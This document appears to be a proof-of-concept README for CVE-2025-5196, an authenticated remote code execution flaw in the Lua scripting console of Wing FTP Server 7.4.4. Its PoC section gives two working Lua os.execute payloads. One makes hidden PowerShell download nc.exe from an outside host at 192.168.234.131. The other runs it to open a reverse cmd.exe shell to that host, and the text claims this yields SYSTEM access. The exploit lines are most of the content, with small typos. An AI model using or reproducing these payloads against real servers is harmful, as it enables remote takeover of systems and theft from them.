Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing. CVE-2025-5196# Wing FTP Server 7.4.4 - Remote Code Execution (Authenticated) (CVE-2025-5196)
Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing.
Affected Version: Wing FTP Server 7.4.4 (Windows) | Authentication Required: Yes
---
# Download & Release Notes
Until May 24, 2025, the latest version of the application provided by the vendor can be found at the following link: https://www.wftpserver.com/download.htm
Additionally, it can be noted that until the same date, there is a release note published informing that the RCE vulnerability has been fixed in version 7.4.4. The link to the release notes can be found here: https://www.wftpserver.com/serverhistory.htm
---
# PoC
PoC related to CVE-2025-5196 [VulDB](https://vuldb.com/?id.310279)
Wing FTP Server Web Interface
The first peace of the command will download the nc.exe (netcat for Windows x86) to the path "C:\Users\usuario\Desktop\Drops". The second part will execute nc.exe 192.168.234.131 4443 -e cme.exe.
```
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
```
```
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')
```
NT/SYSTEM Shell
[4.0K] /data/pocs/ab4ebd7a6c2611d4253f927156e85285571d007c
├── [ 475] poc.txt
└── [2.0K] README.md
0 directories, 2 files